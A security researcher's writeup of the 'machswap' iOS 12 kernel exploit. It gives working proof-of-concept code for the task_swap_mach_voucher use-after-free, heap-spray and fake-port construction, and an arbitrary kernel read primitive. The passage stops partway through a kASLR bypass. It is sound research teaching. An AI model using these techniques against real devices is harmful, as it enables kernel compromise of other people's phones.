MachSwap: an iOS 12 Kernel Exploit

Back at the end of January I demo’d an early iOS 12 prototype jailbreak, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the inital non-SMAP exploit under the name machswap (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others which are interested in iOS security research.

Looking at a modern iOS exploit

On the 23rd of January 2019, security researcher @S0rryMybad released a proof of concept exploit for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with a Chinese blog post describing the bug and possible exploitation techniques, and later an English version.

The bug is a user-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue due to a poor implementation of a function within the kernel.

Before explaining the details of the bug, it’s important to understand a little about MIG, and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, etc, devices).

0x01 Mach, MIG, and UAF’s

Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one-another. This includes the kernel, as well as other system services and daemons which are responsible for handing specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set-up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”, for example you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, in XNU this is known as a “handle”.

While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.

Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:

// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs

subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;

WaitTime 2500;

#include <mach/std_types.defs>
#include <mach/mach_types.defs>

routine call(server_port : mach_port_t;
             in command  : uint8_t;
             in pid      : uint32_t);

This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed from any clients that wish to communicate with it. In this 3 arguments are provided to the server; the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.

MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.

But is this always the case? A bug which allows an attacker to decrement the reference count more than intended often means the object can be released when it’s still being used by code; leading to a use-after-free (UAF) condition. This is often referred to as “dropping a ref”. “Releasing” in this case means the memory which the object is held in is “released” back to the allocator (a mechanism which manages memory allocations, in userland this is “malloc”, in kernel this is often “kalloc”) – this is also known as “freeing” the memory (hence the term use-after-free). This means the memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then used by function “B”, this has the potential to cause interference to the workings of function “A”. It’s important to note that the object or memory allocation which has been UAF’d doesn’t have to be continuously used by a single function, the important thing is that the code using the released object still views it as “valid” and think it’s being used exclusively by that code, even if this is not the case as far as the allocator is concerned (ie; the allocator has released that memory and has now allocated it elsewhere).

From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the acutal size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.

0x02 The Vuln

This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:

task_swap_mach_voucher(
	task_t			task,
	ipc_voucher_t		new_voucher,
	ipc_voucher_t		*in_out_old_voucher)
{
	if (TASK_NULL == task)
		return KERN_INVALID_TASK;

	*in_out_old_voucher = new_voucher;
	return KERN_SUCCESS;
}

Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:

        task = convert_port_to_task(In0P->Head.msgh_request_port);

        /* increments by one */
        new_voucher = convert_port_to_voucher(In0P->new_voucher.name);

        /* increments by one */
        old_voucher = convert_port_to_voucher(In0P->old_voucher.name);

        RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
        ipc_voucher_release(new_voucher); /* decrements by one */
        task_deallocate(task);
        if (RetCode != KERN_SUCCESS) {
                MIG_RETURN_ERROR(OutP, RetCode);
        }
        if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
                ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);

        if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
                ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
                
        /* decrements by one */
        OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);

To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command mig -DKERNEL -DKERNEL_SERVER mig.defs

At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because of the MIG code having no understanding of what the kernel code (task_swap_mach_voucher) itself is doing, and vice-versa, this leads to an issue. After task_swap_mach_voucher is called, old_voucher and new_voucher will be equal (remember, task_swap_mach_voucher assigns new_voucher into old_voucher). Therefore, the refcount on new_voucher will be incremented once, and then decremented twice by both ipc_voucher_release, and convert_voucher_to_port (again, old_voucher is now equal to new_voucher). The refcount on old_voucher itself will also not be decremented at all. This leads us to the following proof of concept (PoC):

        mach_voucher_attr_recipe_data_t atm_data = 
        {
                .key = MACH_VOUCHER_ATTR_KEY_ATM,
                .command = 510
        };

        mach_port_t p1;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);

        mach_port_t p2;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);

        mach_port_t p3;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);

        /* 
                We assign p1 (our target voucher) onto our thread so it can be accessed again later.
                When we later try to retreive it 
                This will increment a ref on the voucher -- the current refcount is 2 
        */
        ret = thread_set_mach_voucher(mach_thread_self(), p1);

        ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1 

        ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)

        /* Ask for a handle on the danging voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */ 
        mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
        ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);

Here we trigger the bug twice via the task_swap_mach_voucher call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.

0x03 Beginning our Exploitation

Once the voucher has been free’d we can then replace this with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (a place in a program in which allocations managed by the allocator are created and destroyed) to overwrite the now-free’d voucher with our own data. If this is done successfully, we would then have the voucher pointer in our thread pointing to our arbitrary voucher struct, and we could use the thread_get_mach_voucher function to get a userland handle on that voucher, which can then be passed to Mach API’s to gain new attack primitives.

The ipc_voucher struct is defined as follows:

struct ipc_voucher {
	iv_index_t		iv_hash;	/* checksum hash */
	iv_index_t		iv_sum;		/* checksum of values */
	os_refcnt_t		iv_refs;	/* reference count */
	iv_index_t		iv_table_size;	/* size of the voucher table */
	iv_index_t		iv_inline_table[IV_ENTRIES_INLINE];
	iv_entry_t		iv_table;	/* table of voucher attr entries */
	ipc_port_t		iv_port;	/* port representing the voucher */
	queue_chain_t		iv_hash_link;	/* link on hash chain */
};

We can see the iv_refs field which contains the reference count which we dropped, and importantly, a pointer to an ipc_port_t in iv_port. This ipc_port_t struct is the kernel representation of a generic Mach port. In this case, the ipc_voucher implements the ipc_port_t as a field whilst implementing some of its own attributes (for example, iv_table and iv_inline_table).

One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.

When we perform our heap spray we want to spray these ipc_voucher structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the iv_port field, and point that into an attacker controlled ipc_port. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled ipc_port which is “theoretically” owned and managed by the kernel.

This is where the “non-SMAP” element of this exploit comes into play. Typically, on SMAP devices (A10 and newer), the kernel is unable to access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers providing userland allocations when attacking the kernel which can directly be modified in userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older firmwares via updates).

In this case, we can spray an ipc_voucher struct, where the iv_port field contains a pointer to an ipc_port allocated in userland. This means the kernel will use our ipc_port as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:

    kport_t *fakeport = malloc(0x4000);
    mlock((void *)fakeport, 0x4000);
    bzero((void *)fakeport, 0x4000);
    
    fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
    fakeport->ip_references = 100;
    fakeport->ip_lock.type = 0x11;
    fakeport->ip_messages.port.receiver_name = 1;
    fakeport->ip_messages.port.msgcount = 0;
    fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
    fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
    fakeport->ip_srights = 99;
     
    LOG("fakeport: 0x%llx", (uint64_t)fakeport);

    /* the fake voucher to be sprayed */
    fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
    {
        .iv_hash = 0x11111111,
        .iv_sum = 0x22222222,
        .iv_refs = 100,
        .iv_port = (uint64_t)fakeport
    };

You can see we create a fake ipc_voucher which contains 100 refs (this is so the object will never prematurely be destroyed), and the iv_port field contains a pointer directly to our userland fakeport object.

Now we need to spray this object into kernel memory. However; there is a slight problem, and that is related to the “kalloc” allocator and “kalloc zones”.

0x04 Borachio and the Climate Control Team (Abusing GC)

Kalloc, the XNU allocator which is used to allocate our ipc_voucher struct which we have UAF’d, uses a series of “zones” to allocate objects into. These are sections of heap memory which only contain a specific size or type of object. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (however >16 bytes, as this is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:

$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
                             elem         cur         max        cur         max         cur  alloc  alloc    
zone name                   size        size        size      #elts       #elts       inuse   size  count    
-------------------------------------------------------------------------------------------------------------
kalloc.16                     16      12592K      13301K     805888      851264      802478     4K    256   C
kalloc.32                     32       3652K       3941K     116864      126113      113244     4K    128   C
kalloc.48                     48       5952K       8867K     126976      189169      121315     4K     85   C
kalloc.64                     64       9212K      13301K     147392      212816      145701     4K     64   C
kalloc.80                     80       2988K       3941K      38246       50445       37847     4K     51   C
kalloc.96                     96       1496K       1556K      15957       16607       15011     8K     85   C
kalloc.128                   128       5400K       5911K      43200       47292       41427     4K     32   C
kalloc.160                   160       1432K       1556K       9164        9964        7958     8K     51   C
kalloc.192                   192        876K       1037K       4672        5535        4520    12K     64   C
kalloc.224                   224       9488K      10509K      43373       48043       36239    16K     73   C
kalloc.256                   256       2912K       3941K      11648       15764       10799     4K     16   C
kalloc.288                   288       3260K       3892K      11591       13839       10416    20K     71   C
kalloc.368                   368       3488K       4151K       9705       11553        8810    32K     89   C
kalloc.400                   400       2640K       3892K       6758        9964        5665    20K     51   C
kalloc.512                   512       3636K       3941K       7272        7882        6848     4K      8   C
kalloc.576                   576        212K        345K        376         615         290     4K      7   C
kalloc.768                   768       2676K       3503K       3568        4670        3009    12K     16   C
kalloc.1024                 1024       3716K       5911K       3716        5911        3503     4K      4   C
kalloc.1152                 1152        320K        461K        284         410         200     8K      7   C
kalloc.1280                 1280       1040K       1153K        832         922         723    20K     16   C
kalloc.1664                 1664        700K        717K        430         441         399    28K     17   C
kalloc.2048                 2048        932K       1167K        466         583         456     4K      2   C
kalloc.4096                 4096       4816K      13301K       1204        3325        1140     4K      1   C
kalloc.6144                 6144      16704K      26602K       2784        4433        2628    12K      2   C
kalloc.8192                 8192       1536K       5254K        192         656         187     8K      1   C
ipc.ports                    168       5580K      18660K      34011      113737       33156    12K     73   C

The appended awk command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’

Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.

In this list we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’. This is a zone which any ipc ports are allocated into – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray the page containing our free’d port we first need to release the page in the ipc.ports zone back to the allocator, and then re’alloc it into a kalloc zone (which can be sprayed into). This can be done via the GC (Garbage Collect) mechanism. Triggering GC will release any unused pages back to the allocator.

On iOS 10 and older, this mechanism could be triggered via Mach call to the kernel. However, in iOS 11, this functionality was removed, so attackers must now trigger it manually via many methods. In Siguza’s v0rtex writeup, he described one method of doing so:

[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike

Hence the following function. Here we allocate a message which will be sent into the kalloc.16384 zone, and send it (via the send_kalloc_message function) 256 times, recording the amount of time it takes for each. If sending these messages takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.

void trigger_gc_please()
{   
    [...]

    uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
    uint8_t *body = malloc(body_size);
    memset(body, 0x41, body_size);
    
    for (int i = 0; i < gc_ports_cnt; i++)
    {
        uint64_t t0, t1;

        t0 = mach_absolute_time();
        gc_ports[i] = send_kalloc_message(body, body_size);
        t1 = mach_absolute_time();

        if (t1 - t0 > 1000000)
        {
            LOG("got gc at %d -- breaking", i);
            gc_ports_max = i;
            break;
        }
    }

    [...]

    sched_yield();
    sleep(1);
}

Whilst machswap is a particularly fast exploit – this is the slowest part due to its importance. If triggering GC fails, the page will not be released, and our heap spray will fail, hence causing the entire exploit to fail. Since GC works asynchronously (at the same time as other code), we need to wait some time to ensure GC has completed. Hence the inclusion of the sched_yield and sleep calls in the epilogue of this function.

An important factor of GC that must be taken into consideration is that all objects on a given page must be released before the page itself can be released. This means there cannot be a single allocation existing on the same page as our target UAF voucher. To combat this, 0x2000 ports are allocated before our target “p1”, and a further 0x1000 after. See the following code:

    /* allocate 0x2000 vouchers to alloc some new fresh pages */
    for (int i = 0; i < 0x2000; i++)
    {
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
    }
    
    /* alloc our target uaf voucher */
    mach_port_t p1;
    ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
    
    /* allocate 0x1000 more vouchers */
    for (int i = 0; i < 0x1000; i++)
    {
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
    }

    /*
        theoretically, we should now have 3 blocks of memory (roughly) as so:
        |--------------------|-------------|------------------|
        |     ipc ports      | target port |  more ipc ports  |
        |--------------------|-------------|------------------| 
                             ^             ^
                              page with only our controlled ports
        hopefully our target port is now allocated on a page which contains only our 
        controlled ports. this means when we release all of our ports *all* allocations
        on the given page will be released, and when we trigger GC the page will be released
        back from the ipc_ports zone to be re-used by kalloc 
        this allows us to spray our fake vouchers via IOSurface in other kalloc zones 
        (ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
        of our allocations
    */

After triggering the UAF bug and releasing the target port, we can then release all of our controlled ports and then continue in attempting to trigger GC.

0x05 A Heap Spray for your Sprog

Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray in order to send our fake voucher into kernel and replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handing drivers and extensions, and a user client is an object while allows a user to issue commands to a kernel extension. IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as array’s (OSArray), dictionaries (OSDictionary), strings (OSStrings), etc. Within these objects we can place completely arbitrary data (including nesting types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, or blocks from the sandbox. To spray our data, we can create a surface consisting of OSString’s to spray our data. We set up a single Surface, and then use an array containing a single dictionary, where each entry contains one of the OSString’s we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4k devices, the pagesize is 0x1000 (4096), and on 16k devices, 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code below sets up the data which will be set onto the surface (and hence sprayed into kernel memory), with the bcopy loop then filling each of our OSString’s with our fake ipc_vouchers.

#define FILL_MEMSIZE 0x4000000
    int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
    
    int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
    uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
    bzero((void *)spray_data, spray_size);
    
    uint32_t *spray_cur = spray_data;
    
   /*
        +-> Surface
          +-> Array
            +-> Dictionary
              +-> OSString 
              +-> OSString
              +-> OSString 
                etc (spray_qty times)...
   */

    *(spray_cur++) = surface->id;
    *(spray_cur++) = 0x0;
    *(spray_cur++) = kOSSerializeMagic;
    *(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
    *(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;
    for (int i = 0; i < spray_qty; i++)
    {
        *(spray_cur++) = kOSSerializeSymbol | 5;
        *(spray_cur++) = transpose(i);
        *(spray_cur++) = 0x0;
        *(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
        
        for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize; 
             ptr + sizeof(fake_ipc_voucher_t) <= end; 
             ptr += sizeof(fake_ipc_voucher_t))
        {
            bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
        }
        
        spray_cur += (pagesize / sizeof(uint32_t));
    }

We can then make a call to the userclient to set the provided data onto the Surface:

    uint32_t dummy = 0;
    size = sizeof(dummy);
    ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
    if(ret != KERN_SUCCESS)
    {
        LOG("setValue(prep): %s", mach_error_string(ret));
        goto out;
    }

If this has worked correctly, our free’d ipc_voucher will have now been replaced with our fake voucher which we have copied onto kernel memory via our heap spray. This means the port stashed on our thread will now point to our fake ipc_voucher, which points to our fake ipc_port, which is allocated in userland as fakeport. We now attempt to get a handle onto this voucher/port, via the thread_get_mach_voucher call:

    mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
    
    /* fingers crossed we get a userland handle onto our 'fakeport' object */
    ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);

    LOG("port: %x", real_port_to_fake_voucher);
    
    /* things are looking good; should be 100% success rate from here */
    LOG("WE REALLY POSTED UP ON THIS BLOCK");
    
    mach_port_t the_one = real_port_to_fake_voucher;

From here, things are looking good. Assuming our port is infact valid, we should have a 100% success rate from this point – the dangerous parts are now over.

0x06 Eavesdropping Kernel Memory: Building a Read Primitive

We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.

Typically, I would recommend setting up a read primitive via the mach_port_get_attributes Mach call, as demonstrated in the v0rtex exploit. This call implements proper locking on the port, However, due to the aformentioned lack of receive right, this is not possible. Instead, we will use an older but more common technique with regard to Mach-based exploitation; the pid_for_task primitive. The Mach API implements a function called “pid_for_task”, which will return the pid of a process of whom’s task port you provide. Here is the (heavily stripped) kernel code:

pid_for_task(
	struct pid_for_task_args *args)
{
	mach_port_name_t	t = args->t;
	user_addr_t		pid_addr  = args->pid;
        
        [...]

	t1 = port_name_to_task_inspect(t);

        [...]

        p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
        if (p) {
                pid  = proc_pid(p); /* Returns p->p_pid */
                err = KERN_SUCCESS; 
        } [...]

	(void) copyout((char *) &pid, pid_addr, sizeof(int));
	return(err);
}

You can see get_bsdtask_info is called on the task port we provide, and then the resulting pid from proc_pid is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from get_bsdtask_info (even so, such checks would be futile against this primitive). Let’s look at get_bsdtask_info and proc_pid:

void  *get_bsdtask_info(task_t t)
{
    /* ldr x0, [x0, #0x358]; ret */
    return(t->bsd_info);
}

int
proc_pid(proc_t p)
{
    if (p != NULL)
        /* ldr w0, [x0, #0x60]; ret */
        return (p->p_pid);
    return -1;
}

In essence, via this call, we can retrieve the value of task->bsd_info->p_pid. Since we have control over the task struct (this is a field within our fakeport), we have full control of the address which bsd_info points to. Therefore, by manipulating the bsd_info pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can use two adjacent 32-bit reads and later combine the values to calculate the original value.

We first allocate a fake task object which resides in the ip_kobject field of our fakeport. We also set the ip_bits field of our fakeport to IO_BITS_ACTIVE | IKOT_TASK – this marks our ipc_port as a port which represents a task, allowing us to use calls such as pid_for_task on it.

    ktask_t *fake_task = (ktask_t *)malloc(0x600); // task is about 0x568 or some shit
    bzero((void *)fake_task, 0x600);
    fake_task->ref_count = 0xff;
    
    uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
    
    fakeport->ip_kobject = (uint64_t)fake_task;

The read_addr_ptr points to our bsd_info pointer which we can overwrite with arbitrary kernel addresses. We then implement our 32bit read primitive as so:

        #define rk32(addr, value)\
        *read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
        value = 0x0;\
        ret = pid_for_task(the_one, (int *)&value);

Note the addr - offsets->struct_offsets.proc_pid. This is because when the p_pid field is accessed within the bsd_info struct, it will add the offset of struct_offsets.proc_pid to the bsd_info pointer before performing the read. We therefore subtract this value to account for this and read the correct data.

As previosuly noted, we can combine adjacent 32bit values for a full 64bit read:

        #define rk64(addr, value)\
        rk32(addr + 0x4, read64_tmp);\                  /* Read the higher */ 
        rk32(addr, value);\                             /* Read the lower */
        value = value | ((uint64_t)read64_tmp << 32)    /* Shift the higher by 32bits to the left and OR against the lower bits */

We now have a working read primitive based on our fakeport and newly-allocated fake task struct.

0x07 Defeating kASLR

ASLR (Address Space Layout Randomization) is a mitigation used to make exploitation of software harder by shifting all the static data within a program’s address space by a constant but randomized value (hence the “random” element). In the kernel, this is used to shift all of the static regions (__TEXT, __DATA.__const, etc) from a static base value to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”) as it is commonly used by jailbreaks in order to read and write data from static offsets, and call functions in kernel __TEXT.

The first thought that may come to mind when learning about kASLR is simply “can it be brute forced”? In the typical sense of simply trying to read from every possible base address until you get some data, the answer is no. This is due to the fact that the kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region. If the kernel tries to read from an unmapped region a fault is triggered ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near perfect guess of where the kernel image is located in memory. Here is the code used to derive the kernel base address, courtesy of the iPhoneWiki:

        base = 0x01000000 + (slide_byte * 0x00200000)

The slide_byte spans values 0 through 255, however in the case of 0 a base of 0x21000000 is used, so in this case we can use the model that the slide_byte is actually values 1 through 256. This means that the lowest base is 0x01200000, and the highest is 0x21000000. Subtracting these we get the value 0x1fe00000, which is a whopping 530+mb of data! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.

However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from jtool:

$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64          Mem: 0xfffffff007004000-0xfffffff007078000	__TEXT
LC 01: LC_SEGMENT_64          Mem: 0xfffffff007078000-0xfffffff007098000	__DATA_CONST
LC 02: LC_SEGMENT_64          Mem: 0xfffffff007098000-0xfffffff0075c8000	__TEXT_EXEC
LC 03: LC_SEGMENT_64          Mem: 0xfffffff0075c8000-0xfffffff0075cc000	__LAST
LC 04: LC_SEGMENT_64          Mem: 0xfffffff0075cc000-0xfffffff0075d0000	__KLD
LC 05: LC_SEGMENT_64          Mem: 0xfffffff0075d0000-0xfffffff007678000	__DATA
LC 06: LC_SEGMENT_64          Mem: 0xfffffff007678000-0xfffffff007690000	__BOOTDATA
LC 07: LC_SEGMENT_64          Mem: 0xfffffff005ca4000-0xfffffff006138000	__PRELINK_TEXT
LC 08: LC_SEGMENT_64          Mem: 0xfffffff0077e8000-0xfffffff0079e0000	__PRELINK_INFO
[...]

Up until the beginning of PRELINK_TEXT, all regions (including __TEXT) are mapped completely continuously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (ie, the address of a function), we can then derive the base of the kernel via brute force as we are guaranteed not to hit any unmapped memory! The only question is, how do we get such a pointer?

In C++, every object contains something called a vtable. The vtable is an array of “virtual” methods (methods which the object implements). The vtable is located at offset 0x0 within the object, and is simply a list of function pointers. If we can find a C++ object (and therefore its vtable), we can get our function pointer, and derive the kernel slide.

Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.

One example is the IOSurfaceUserClient object, which we created earlier when we set up our heap spray. We can register the port we opened to the client via the mach_ports_register API, which sets a pointer to the port to a field within our task struct: itk_registered.

kern_return_t
mach_ports_register(
	task_t			task,
	mach_port_array_t	memory,
	mach_msg_type_number_t	portsCnt)
{
        [...]

	for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
		ipc_port_t old;

		old = task->itk_registered[i];
		task->itk_registered[i] = ports[i];
		ports[i] = old;
	}
        
        [...]

	return KERN_SUCCESS;
}

So from our task struct, we can read the itk_registered offset to find the IOSurface ipc_port, then to the ip_kobject field to find the C++ object itself, then dereference at offset 0x0 to find the vtable, and then dereference any of the vtable methods to find our __TEXT pointer. However, we first need to find our task struct. For this, we can look at itk_space. This is an address space which holds mach port rights owned by a task, mapping the uint32_t port handles to kernel-side ipc_port_t’s. If we can find a message sent to a port owned by our process, we can find the itk_space pointer and therefore traverse kernel memory to find the address of a port we allocate within our task, and from there our own task struct (ipc_space->is_task).

Luckily, our fakeport is owned by our process, we have a userland handle on it of which we can send a message to, and we can then read the ip_messages struct within our fakeport to find the kernel representation of the Mach message which was sent. This is similar to a technique which I have used in the past in order to get a buffer of data into kernelspace, except this time it is used for ports instead of data.

static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
    typedef struct {
        mach_msg_header_t          Head;
        mach_msg_body_t            msgh_body;
        mach_msg_port_descriptor_t task_port;
    } Request;

    [...]
    
    InP->msgh_body.msgh_descriptor_count = 1;
    InP->task_port.name = myP;
    InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
    InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;

    err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
    
    [...]
}

Here we set up a message containing a mach port descriptor, and put our port handle into the OOL (out of line) port descriptor. We then call send_port using our fakeport as the rcv argument, and a newly allocated port with both receive and send rights as our myP argument.

Once the Mach message has been sent, it will be present within fakeport->ip_messages.port.messages. We can then traverse from this message to find the pointer to our task as so:

    ret = send_port(the_one, gangport);

    uint64_t ikmq_base = fakeport->ip_messages.port.messages;

    uint64_t ikm_header = 0x0;
    rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */

    uint64_t port_addr = 0x0;
    rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */ 

    uint64_t itk_space = 0x0;
    rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);

    uint64_t ourtask = 0x0;
    rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */

Since we now have a pointer to our task struct, we can now use the mach_ports_register trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:

    ret = mach_ports_register(mach_task_self(), &client, 1);

    uint64_t iosruc_port = 0x0;
    rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);

    uint64_t iosruc_addr = 0x0;
    rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);

    uint64_t iosruc_vtab = 0x0;
    rk64(iosruc_addr + 0x0, iosruc_vtab);

